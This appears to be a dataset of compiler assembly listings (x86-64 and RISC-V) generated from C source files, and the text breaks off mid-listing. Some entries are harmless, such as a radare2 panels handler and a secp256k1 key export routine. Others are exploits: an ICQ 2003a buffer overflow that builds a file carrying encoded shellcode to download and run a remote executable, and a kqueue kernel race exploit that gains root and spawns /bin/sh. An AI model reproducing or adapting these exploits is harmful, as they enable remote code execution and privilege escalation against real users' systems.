24 popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L19: .cfi_restore_state cmpq $0, 8(%rbp) leaq 1(%rsi), %r12 jne .L23 .L16: movl 4(%rbp), %edi movq %r12, %rdx leaq .LC4(%rip), %rsi call r_config_set@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 movl $1, %eax popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L18: .cfi_restore_state leaq .LC0(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC1(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC2(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC3(%rip), %rdi xorl %eax, %eax call eprintf@PLT xorl %eax, %eax jmp .L1 .p2align 4,,10 .p2align 3 .L20: leaq 1(%rsi), %r12 movq %rbp, %rdi movq %r12, %rsi call r_save_panels_layout@PLT jmp .L16 .p2align 4,,10 .p2align 3 .L22: leaq 1(%rax), %r12 movq %rbp, %rdi xorl %edx, %edx movq %r12, %rsi call r_core_editor@PLT movq %rax, %rdi testq %rax, %rax je .L10 call free@PLT xorl %eax, %eax jmp .L24 .p2align 4,,10 .p2align 3 .L23: movq %r12, %rsi movq %rbp, %rdi call r_load_panels_layout@PLT jmp .L16 .p2align 4,,10 .p2align 3 .L10: movq %r12, %rsi leaq .LC5(%rip), %rdi xorl %eax, %eax call eprintf@PLT xorl %eax, %eax jmp .L1 .cfi_endproc .LFE0: .size cmd_panels, .-cmd_panels .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_cmd.c_cmd_panels_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "Usage: v[*i]\n" .align 3 .LC1: .string "v.test # save current layout with name test\n" .align 3 .LC2: .string "v test # load saved layout with name test\n" .align 3 .LC3: .string "vi ... # launch 'cfg.editor'\n" .align 3 .LC4: .string "scr.layout" .align 3 .LC5: .string "Cannot open file (%s)\n" .text .align 1 .type cmd_panels, @function cmd_panels: ld a5,16(a0) bne a5,zero,.L23 addi sp,sp,-48 sd ra,40(sp) sd s0,32(sp) sd s1,24(sp) lbu a5,0(a1) li a4,63 mv a2,a1 beq a5,a4,.L24 li a4,32 mv s0,a0 beq a5,a4,.L25 li a4,61 beq a5,a4,.L26 li a4,105 beq a5,a4,.L27 lw a1,0(a0) call r_core_visual_panels_root@plt li a0,1 .L3: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) addi sp,sp,48 jr ra .L25: ld a5,8(a0) addi a2,a1,1 bne a5,zero,.L28 .L21: lw a0,4(s0) lla a1,.LC4 call r_config_set@plt ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) li a0,1 addi sp,sp,48 jr ra .L23: li a0,0 ret .L27: li a1,32 mv a0,a2 call strchr@plt beq a0,zero,.L20 addi s1,a0,1 li a2,0 mv a1,s1 mv a0,s0 call r_core_editor@plt beq a0,zero,.L10 call free@plt .L20: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) li a0,0 addi sp,sp,48 jr ra .L24: lla a0,.LC0 call eprintf@plt lla a0,.LC1 call eprintf@plt lla a0,.LC2 call eprintf@plt lla a0,.LC3 call eprintf@plt li a0,0 j .L3 .L26: addi s1,a1,1 mv a1,s1 call r_save_panels_layout@plt mv a2,s1 j .L21 .L28: mv a1,a2 sd a2,8(sp) call r_load_panels_layout@plt ld a2,8(sp) j .L21 .L10: mv a1,s1 lla a0,.LC5 call eprintf@plt li a0,0 j .L3 .size cmd_panels, .-cmd_panels .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_1277.c_main_aug_v3_8
.file "extr_1277.c_main_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n" .align 8 .LC1: .string "\tBug discovered & exploit coded by ATmaCA\n" .align 8 .LC2: .string "\tWeb: http://www.spyinstructors.com && http://www.atmacasoft.com\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC3: .string "\tE-Mail: [email protected]\n" .section .rodata.str1.8 .align 8 .LC4: .string "\tCredit to Kozan and delicon\n\n" .section .rodata.str1.1 .LC5: .string "Usage:\n" .LC6: .string " icq_bof <WebUrl>\n" .section .rodata.str1.8 .align 8 .LC7: .string " Example:icq_bof http://www.atmacasoft.com/small.exe\n" .section .rodata.str1.1 .LC9: .string "\"\377" .LC10: .string "\035" .LC11: .string "w+" .LC12: .string "bof.txt" .LC13: .string "%s" .section .rodata.str1.8 .align 8 .LC14: .string "\r\nbof.txt has been generated!\r\n" .align 8 .LC8: .string "\353\020X1\311f\201\351\"\377\2000\035@\342\372\353\005\350\353\377\377\377\364\321\035\035\035B\365K\035\035\035\224\336Mu\223S\023\361\365}\035\035\035,\324{\244rsLuhoqpI\342\315Mu+\0072m\365[\035\035\035,\324LL\220*K\220j\025KL\342\315Nu\205\343\227\023\3650\035\035\035LJ\342\315,\324T\377\343Nuc\305\377n\365\004\035\035\035\342\315HKy\274-\035\035\035\226]\021\226m\001\260\226u\025\224\365C@\336NHKJ\226q9\005\226X!\226I\030e\034\367\226W\005\226G=\034\366\376(T\226)\226\034\363,\342\341,\335\261%\375i\032\334\322\020\034\332\366\357&a9\th\374\226G9\034\366{\226\021V\226G\001\034\366\226\031\226\034\365\364\037\035\035\035,\335\224\367BC@F\336\3652\342\342\342puu3xex\035" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 subq $768, %rsp .cfi_def_cfa_offset 800 movq %fs:40, %rax movq %rax, 760(%rsp) movl g_aug_volatile_8632(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_8632(%rip) cmpl $2, %edi jle .L12 movq %rsi, %rdx leaq 16(%rsp), %r13 leaq 16(%rsp), %rdi movl $246, %ecx movq 8(%rdx), %r12 leaq .LC8(%rip), %rsi movw $-222, 14(%rsp) rep movsb leaq .LC9(%rip), %rsi movq %r13, %rdi call strstr@PLT movq %r12, %rdi movq %rax, %rbp call strlen@PLT movl $2, %edx leaq 14(%rsp), %rsi movq %rbp, %rdi addl $1, %eax subw %ax, 14(%rsp) xorl %eax, %eax call memcpy@PLT movq %r12, %rdi call strlen@PLT leal 247(%rax), %edi call malloc@PLT movq %r13, %rsi movq %rax, %rdi movq %rax, %rbp call strcpy@PLT movq %r12, %rdi call Sifrele@PLT movq %rbp, %rdi movq %rax, %rsi call strcat@PLT leaq .LC10(%rip), %rsi movq %rbp, %rdi call strcat@PLT leaq .LC11(%rip), %rsi leaq .LC12(%rip), %rdi call fopen@PLT movq %rax, %r12 testq %rax, %rax je .L1 leaq 272(%rsp), %r13 movl $480, %edx movl $144, %esi movq %r13, %rdi call memset@PLT movq %rbp, %rdi movl $302144604, 306(%rsp) call strlen@PLT leaq 338(%rsp), %rdi movq %rbp, %rsi movl %eax, %edx xorl %eax, %eax call memcpy@PLT movq %r13, %rdx leaq .LC13(%rip), %rsi movq %r12, %rdi movl $0, 752(%rsp) call fprintf@PLT movq %r12, %rdi call fclose@PLT leaq .LC14(%rip), %rdi call printf@PLT .L1: movq 760(%rsp), %rax subq %fs:40, %rax jne .L10 addq $768, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L12: .cfi_restore_state leaq .LC0(%rip), %rdi call printf@PLT leaq .LC1(%rip), %rdi call printf@PLT leaq .LC2(%rip), %rdi call printf@PLT leaq .LC3(%rip), %rdi call printf@PLT leaq .LC4(%rip), %rdi call printf@PLT leaq .LC5(%rip), %rdi call printf@PLT leaq .LC6(%rip), %rdi call printf@PLT movq 760(%rsp), %rax subq %fs:40, %rax jne .L10 addq $768, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 leaq .LC7(%rip), %rdi popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp printf@PLT .L10: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl g_aug_volatile_8632 .data .align 4 .type g_aug_volatile_8632, @object .size g_aug_volatile_8632, 4 g_aug_volatile_8632: .long 7 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_1277.c_main_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n" .align 3 .LC1: .string "\tBug discovered & exploit coded by ATmaCA\n" .align 3 .LC2: .string "\tWeb: http://www.spyinstructors.com && http://www.atmacasoft.com\n" .align 3 .LC3: .string "\tE-Mail: [email protected]\n" .align 3 .LC4: .string "\tCredit to Kozan and delicon\n\n" .align 3 .LC5: .string "Usage:\n" .align 3 .LC6: .string " icq_bof <WebUrl>\n" .align 3 .LC7: .string " Example:icq_bof http://www.atmacasoft.com/small.exe\n" .align 3 .LC9: .string "\"\377" .align 3 .LC10: .string "\035" .align 3 .LC11: .string "w+" .align 3 .LC12: .string "bof.txt" .align 3 .LC13: .string "%s" .align 3 .LC14: .string "\r\nbof.txt has been generated!\r\n" .align 3 .LC8: .string "\353\020X1\311f\201\351\"\377\2000\035@\342\372\353\005\350\353\377\377\377\364\321\035\035\035B\365K\035\035\035\224\336Mu\223S\023\361\365}\035\035\035,\324{\244rsLuhoqpI\342\315Mu+\0072m\365[\035\035\035,\324LL\220*K\220j\025KL\342\315Nu\205\343\227\023\3650\035\035\035LJ\342\315,\324T\377\343Nuc\305\377n\365\004\035\035\035\342\315HKy\274-\035\035\035\226]\021\226m\001\260\226u\025\224\365C@\336NHKJ\226q9\005\226X!\226I\030e\034\367\226W\005\226G=\034\366\376(T\226)\226\034\363,\342\341,\335\261%\375i\032\334\322\020\034\332\366\357&a9\th\374\226G9\034\366{\226\021V\226G\001\034\366\226\031\226\034\365\364\037\035\035\035,\335\224\367BC@F\336\3652\342\342\342puu3xex\035" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-800 sd s2,768(sp) la s2,__stack_chk_guard ld a5, 0(s2) sd a5, 744(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,1 sw a5,.LANCHOR0,a4 sd ra,792(sp) sd s0,784(sp) sd s1,776(sp) sd s3,760(sp) li a5,2 ble a0,a5,.L14 addi s3,sp,8 lla a5,.LC8 mv a4,s3 lla t1,.LC8+240 .L4: ld a7,0(a5) ld a6,8(a5) ld a0,16(a5) ld a2,24(a5) ld a3,32(a5) sd a7,0(a4) sd a6,8(a4) sd a0,16(a4) sd a2,24(a4) sd a3,32(a4) addi a5,a5,40 addi a4,a4,40 bne a5,t1,.L4 lw a3,0(a5) lhu a5,4(a5) ld s1,8(a1) mv a0,s3 sh a5,4(a4) sw a3,0(a4) li a5,-222 lla a1,.LC9 sh a5,6(sp) call strstr@plt mv s0,a0 mv a0,s1 call strlen@plt lhu a5,6(sp) addiw a0,a0,1 li a2,2 subw a5,a5,a0 addi a1,sp,6 mv a0,s0 sh a5,6(sp) call memcpy@plt mv a0,s1 call strlen@plt addiw a0,a0,247 call malloc@plt mv a1,s3 mv s0,a0 call strcpy@plt mv a0,s1 call Sifrele@plt mv a1,a0 mv a0,s0 call strcat@plt lla a1,.LC10 mv a0,s0 call strcat@plt lla a1,.LC11 lla a0,.LC12 call fopen@plt mv s1,a0 beq a0,zero,.L1 addi s3,sp,256 li a2,480 li a1,144 mv a0,s3 call memset@plt li a5,24576 addi a5,a5,-932 sh a5,290(sp) li a5,4096 addi a5,a5,514 mv a0,s0 sh a5,292(sp) call strlen@plt mv a2,a0 mv a1,s0 addi a0,sp,322 call memcpy@plt mv a2,s3 lla a1,.LC13 mv a0,s1 sw zero,736(sp) call fprintf@plt mv a0,s1 call fclose@plt lla a0,.LC14 call printf@plt .L1: ld a4, 744(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L12 ld ra,792(sp) ld s0,784(sp) ld s1,776(sp) ld s2,768(sp) ld s3,760(sp) addi sp,sp,800 jr ra .L14: lla a0,.LC0 call printf@plt lla a0,.LC1 call printf@plt lla a0,.LC2 call printf@plt lla a0,.LC3 call printf@plt lla a0,.LC4 call printf@plt lla a0,.LC5 call printf@plt lla a0,.LC6 call printf@plt ld a4, 744(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L12 ld s0,784(sp) ld ra,792(sp) ld s1,776(sp) ld s2,768(sp) ld s3,760(sp) lla a0,.LC7 addi sp,sp,800 tail printf@plt .L12: call __stack_chk_fail@plt .size main, .-main .globl g_aug_volatile_8632 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_8632, @object .size g_aug_volatile_8632, 4 g_aug_volatile_8632: .word 7 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_2
.file "extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_2.c" .text .p2align 4 .globl ec_privkey_export_der .type ec_privkey_export_der, @function ec_privkey_export_der: .LFB24: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rcx, %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rdx, %r12 movq %rcx, %rdx pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %r8d, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $40, %rsp .cfi_def_cfa_offset 96 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax leaq 12(%rsp), %r14 movq $0, 16(%rsp) movq %r14, %rsi call secp256k1_ec_pubkey_create@PLT xorl %edx, %edx testl %eax, %eax je .L2 testl %ebp, %ebp jne .L10 movl $9, %edx leaq begin.1(%rip), %rsi movq %rbx, %rdi call memcpy@PLT leaq 9(%rbx), %rdi movq %r15, %rsi movl $32, %edx call memcpy@PLT movl $173, %edx leaq 41(%rbx), %rdi leaq middle.0(%rip), %rsi call memcpy@PLT movl SECP256K1_EC_UNCOMPRESSED(%rip), %r8d leaq 16(%rsp), %rdx movq $65, 16(%rsp) leaq 214(%rbx), %rbp .L8: movq %r14, %rcx movq %rbp, %rsi movq %r13, %rdi call secp256k1_ec_pubkey_serialize@PLT movq 16(%rsp), %rdx movl $1, %eax addq %rbp, %rdx subq %rbx, %rdx .L2: movq %rdx, (%r12) movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L11 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L10: .cfi_restore_state movl $8, %edx leaq begin.3(%rip), %rsi movq %rbx, %rdi call memcpy@PLT leaq 8(%rbx), %rdi movq %r15, %rsi movl $32, %edx call memcpy@PLT movl $141, %edx leaq 40(%rbx), %rdi leaq middle.2(%rip), %rsi call memcpy@PLT leaq 181(%rbx), %rbp leaq 16(%rsp), %rdx movq $33, 16(%rsp) movl SECP256K1_EC_COMPRESSED(%rip), %r8d jmp .L8 .L11: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size ec_privkey_export_der, .-ec_privkey_export_der .section .rodata .align 32 .type middle.0, @object .size middle.0, 173 middle.0: .string "\240\201\2450\201\242\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004A\004y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230H:\332w&\243\304e]\244\373\374\016\021\b\250\375\027\264H\246\205T\031\234G\320\217\373\020\324\270\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241D\003B" .align 8 .type begin.1, @object .size begin.1, 9 begin.1: .ascii "0\202\001\023\002\001\001\004 " .align 32 .type middle.2, @object .size middle.2, 141 middle.2: .string "\240\201\2050\201\202\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004!\002y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241$\003\"" .align 8 .type begin.3, @object .size begin.3, 8 begin.3: .ascii "0\201\323\002\001\001\004 " .globl SECP256K1_EC_UNCOMPRESSED .bss .align 4 .type SECP256K1_EC_UNCOMPRESSED, @object .size SECP256K1_EC_UNCOMPRESSED, 4 SECP256K1_EC_UNCOMPRESSED: .zero 4 .globl SECP256K1_EC_COMPRESSED .align 4 .type SECP256K1_EC_COMPRESSED, @object .size SECP256K1_EC_COMPRESSED, 4 SECP256K1_EC_COMPRESSED: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_2.c" .option pic .text .align 1 .globl ec_privkey_export_der .type ec_privkey_export_der, @function ec_privkey_export_der: addi sp,sp,-96 sd s4,48(sp) sd s6,32(sp) la s4,__stack_chk_guard addi s6,sp,12 sd s0,80(sp) sd s2,64(sp) ld a5, 0(s4) sd a5, 24(sp) li a5, 0 mv s0,a1 mv s2,a2 mv a1,s6 mv a2,a3 sd s1,72(sp) sd s3,56(sp) sd s5,40(sp) sd ra,88(sp) mv s1,a3 mv s3,a0 mv s5,a4 sd zero,16(sp) call secp256k1_ec_pubkey_create@plt li a5,0 beq a0,zero,.L2 bne s5,zero,.L10 li a2,9 lla a1,.LANCHOR0+152 mv a0,s0 call memcpy@plt mv a1,s1 li a2,32 addi a0,s0,9 call memcpy@plt li a2,173 lla a1,.LANCHOR0+168 addi a0,s0,41 call memcpy@plt addi s1,s0,214 lw a4,.LANCHOR1+4 mv a3,s6 addi a2,sp,16 mv a1,s1 mv a0,s3 li a5,65 .L8: sd a5,16(sp) call secp256k1_ec_pubkey_serialize@plt ld a5,16(sp) li a0,1 add a5,s1,a5 sub a5,a5,s0 .L2: sd a5,0(s2) ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L11 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) addi sp,sp,96 jr ra .L10: li a2,8 lla a1,.LANCHOR0 mv a0,s0 call memcpy@plt mv a1,s1 li a2,32 addi a0,s0,8 call memcpy@plt li a2,141 lla a1,.LANCHOR0+8 addi a0,s0,40 call memcpy@plt addi s1,s0,181 lw a4,.LANCHOR1 mv a3,s6 addi a2,sp,16 mv a1,s1 mv a0,s3 li a5,33 j .L8 .L11: call __stack_chk_fail@plt .size ec_privkey_export_der, .-ec_privkey_export_der .globl SECP256K1_EC_UNCOMPRESSED .globl SECP256K1_EC_COMPRESSED .section .rodata .align 3 .set .LANCHOR0,. + 0 .type begin.3, @object .size begin.3, 8 begin.3: .ascii "0\201\323\002\001\001\004 " .type middle.2, @object .size middle.2, 141 middle.2: .string "\240\201\2050\201\202\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004!\002y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241$\003\"" .zero 3 .type begin.1, @object .size begin.1, 9 begin.1: .ascii "0\202\001\023\002\001\001\004 " .zero 7 .type middle.0, @object .size middle.0, 173 middle.0: .string "\240\201\2450\201\242\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004A\004y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230H:\332w&\243\304e]\244\373\374\016\021\b\250\375\027\264H\246\205T\031\234G\320\217\373\020\324\270\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241D\003B" .bss .align 2 .set .LANCHOR1,. + 0 .type SECP256K1_EC_COMPRESSED, @object .size SECP256K1_EC_COMPRESSED, 4 SECP256K1_EC_COMPRESSED: .zero 4 .type SECP256K1_EC_UNCOMPRESSED, @object .size SECP256K1_EC_UNCOMPRESSED, 4 SECP256K1_EC_UNCOMPRESSED: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_9860.c_main_aug_v3_8
.file "extr_9860.c_main_aug_v3_8.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] allocating %p @ %p\n" .LC1: .string "mmap" .LC2: .string "kqueue" .LC3: .string "waiting for root..." .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC4: .string "failed - system patched or not MP" .section .rodata.str1.1 .LC5: .string "sh" .LC6: .string "/bin/sh" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 movl $61440, %r13d pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 leaq .LC0(%rip), %r12 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 xorl %ebp, %ebp pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 xorl %ebx, %ebx subq $88, %rsp .cfi_def_cfa_offset 128 movq %fs:40, %rax movq %rax, 72(%rsp) xorl %eax, %eax movq $173412352, 24(%rsp) movq $58601472, 32(%rsp) movq $4096, 56(%rsp) movq $4096, 64(%rsp) .L5: movq %rbp, %rdx movq %r13, %rsi movq %r12, %rdi xorl %eax, %eax call printf@PLT xorl %r9d, %r9d movq %r13, %rsi movq %rbp, %rdi movl MAP_ANON(%rip), %ecx movl PROT_READ(%rip), %edx movl $-1, %r8d orl PROT_WRITE(%rip), %edx orl MAP_FIXED(%rip), %ecx orl PROT_EXEC(%rip), %edx call mmap@PLT cmpq MAP_FAILED(%rip), %rax je .L25 addq $8, %rbx cmpq $24, %rbx je .L4 movq 16(%rsp,%rbx), %rbp movq 48(%rsp,%rbx), %r13 jmp .L5 .p2align 4,,10 .p2align 3 .L4: movslq JE_ADDRESS(%rip), %rax leaq kernel_code(%rip), %rsi movq %rax, 28 movq 64(%rsp), %rdx movq 32(%rsp), %rax shrq $2, %rdx leaq (%rax,%rdx,8), %rcx je .L10 .p2align 4,,10 .p2align 3 .L9: movq %rax, %rdx addq $8, %rax movq %rsi, (%rdx) cmpq %rax, %rcx jne .L9 .L10: xorl %eax, %eax call kqueue@PLT movl %eax, kq(%rip) testl %eax, %eax js .L26 movq do_thread(%rip), %rdx leaq 4(%rsp), %rdi xorl %ecx, %ecx xorl %esi, %esi xorl %ebx, %ebx call pthread_create@PLT movq do_thread2(%rip), %rdx xorl %ecx, %ecx xorl %esi, %esi leaq 8(%rsp), %rdi call pthread_create@PLT leaq .LC3(%rip), %rdi movq $0, 8+timeout(%rip) movl $1, timeout(%rip) call puts@PLT jmp .L11 .p2align 4,,10 .p2align 3 .L27: addl $1, %ebx .L12: movl $100, %edi call usleep@PLT .L11: movl gotroot(%rip), %eax testl %eax, %eax je .L12 cmpl $9999, %ebx jle .L27 xorl %edi, %edi call setuid@PLT xorl %eax, %eax call getuid@PLT testq %rax, %rax jne .L28 xorl %edx, %edx leaq .LC5(%rip), %rsi leaq .LC6(%rip), %rdi call execl@PLT movl $0, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jg .L16 .p2align 4,,10 .p2align 3 .L15: movl 12(%rsp), %eax addl $1, %eax movl %eax, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jle .L15 .L16: xorl %eax, %eax .L1: movq 72(%rsp), %rdx subq %fs:40, %rdx jne .L29 addq $88, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L25: .cfi_restore_state leaq .LC1(%rip), %rdi call perror@PLT orl $-1, %eax jmp .L1 .L28: leaq .LC4(%rip), %rdi call puts@PLT orl $-1, %eax jmp .L1 .L26: leaq .LC2(%rip), %rdi call perror@PLT orl $-1, %eax jmp .L1 .L29: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl timeout .bss .align 16 .type timeout, @object .size timeout, 16 timeout: .zero 16 .globl kq .align 4 .type kq, @object .size kq, 4 kq: .zero 4 .globl kernel_code .align 4 .type kernel_code, @object .size kernel_code, 4 kernel_code: .zero 4 .globl gotroot .align 4 .type gotroot, @object .size gotroot, 4 gotroot: .zero 4 .globl do_thread2 .align 8 .type do_thread2, @object .size do_thread2, 8 do_thread2: .zero 8 .globl do_thread .align 8 .type do_thread, @object .size do_thread, 8 do_thread: .zero 8 .globl PROT_WRITE .align 4 .type PROT_WRITE, @object .size PROT_WRITE, 4 PROT_WRITE: .zero 4 .globl PROT_READ .align 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .globl PROT_EXEC .align 4 .type PROT_EXEC, @object .size PROT_EXEC, 4 PROT_EXEC: .zero 4 .globl MAP_FIXED .align 4 .type MAP_FIXED, @object .size MAP_FIXED, 4 MAP_FIXED: .zero 4 .globl MAP_FAILED .align 8 .type MAP_FAILED, @object .size MAP_FAILED, 8 MAP_FAILED: .zero 8 .globl MAP_ANON .align 4 .type MAP_ANON, @object .size MAP_ANON, 4 MAP_ANON: .zero 4 .globl JE_ADDRESS .align 4 .type JE_ADDRESS, @object .size JE_ADDRESS, 4 JE_ADDRESS: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_9860.c_main_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] allocating %p @ %p\n" .align 3 .LC1: .string "mmap" .align 3 .LC2: .string "kqueue" .align 3 .LC3: .string "waiting for root..." .align 3 .LC4: .string "failed - system patched or not MP" .align 3 .LC5: .string "sh" .align 3 .LC6: .string "/bin/sh" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-160 sd s3,120(sp) la s3,__stack_chk_guard ld a4, 0(s3) sd a4, 72(sp) li a4, 0 li a4,173412352 li a5,4096 sd a4,32(sp) li a4,58601472 sd s0,144(sp) sd s1,136(sp) sd s2,128(sp) sd s4,112(sp) sd s5,104(sp) sd s6,96(sp) sd s7,88(sp) sd ra,152(sp) sd a4,40(sp) sd a5,56(sp) sd a5,64(sp) addi s1,sp,48 addi s5,sp,24 addi s7,sp,72 li s4,0 li s2,61440 lla s0,.LANCHOR0 lla s6,.LC0 .L5: mv a2,s4 mv a1,s2 mv a0,s6 call printf@plt lw a5,12(s0) lw a2,8(s0) lw a0,0(s0) lw a1,16(s0) lw a3,4(s0) or a2,a2,a5 or a2,a2,a1 li a5,0 or a3,a0,a3 li 